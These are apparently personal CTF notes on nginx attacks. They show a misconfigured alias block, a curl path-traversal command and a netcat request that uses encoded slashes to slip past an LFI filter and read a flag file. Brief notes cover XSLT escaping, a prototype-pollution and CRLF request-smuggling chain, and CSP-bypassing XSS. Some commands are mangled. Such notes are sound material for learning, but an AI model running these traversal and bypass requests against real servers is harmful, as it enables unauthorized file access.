NGINX Alias To Path Traversal

Attachments

Hack_The_bot.zip

References

---

events{}
user root;

http {
    server {
        listen 80;

        location / {
            proxy_pass http://127.0.0.1:5000;
        }

        location /logs {
            autoindex off;
            alias /tmp/bot_folder/logs/;
            try_files $uri $uri/ =404;
        }
    }
}

You can do something like this to do path traversal

curl --path-as-is "https://hackthebot2-100459c43a199c0f.deploy.phreaks.fr/logs../browser_cache/DevToolsActivePort

in nginx you can do something like this to bypass LFI waff in path

echo -e “GET /%2f%2f/%2f%2f/%2f%2f/%2f%2f/%2f%2f/../../../../../../opt/flag.txt HTTP/1.1: centvps.centaurushook.xyz” | nc centvps

.centaurushook.xyz 80

nginx ngx_http_xslt_filter_module.so

in nginx you there a serveral module that you can use as example is ngx_http_xslt_filter_module.so

there is something vulnerable about disable-output-escaping="yes" // potluckctf 2023 challenge nginx spagetthi

(1) Prototype pollution of Accept-Charset to inject a Content-Length header when downloading the recipe.json from /download/
(2) CRLF injection into the /download/ request to send two requests in the proxy_pass to download.socket.

=> The download.socket returns two answers, nginx returns both answers in one response because of the overwritten Content-Length header.

Make CSPLess page in nginx

Arbitrary Parentheses-less XSS. against strict CSP policies | by terjanq | Medium